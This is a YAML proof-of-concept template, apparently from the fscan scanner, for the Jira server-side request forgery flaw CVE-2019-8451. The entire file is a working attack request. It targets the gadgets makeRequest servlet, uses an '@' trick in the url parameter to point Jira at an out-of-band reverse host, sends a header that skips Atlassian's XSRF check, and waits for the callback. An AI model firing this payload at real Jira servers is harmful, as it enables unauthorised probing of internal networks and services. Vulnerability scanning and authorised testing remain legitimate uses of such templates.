fscan/WebScan/pocs/jira-ssrf-cve-2019-8451.yml

name: poc-yaml-jira-ssrf-cve-2019-8451
set:
  originScheme: request.url.scheme
  originHost: request.url.host
  reverse: newReverse()
  reverseHost: reverse.url.host
  reverseURL: reverse.url.path
rules:
  - method: GET
    path: >-
      /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}}      
    headers:
      X-Atlassian-Token: no-check
    expression: |
      reverse.wait(5)      
detail:
  author: jingling(https://github.com/shmilylty)
  links:
    - https://jira.atlassian.com/browse/JRASERVER-69793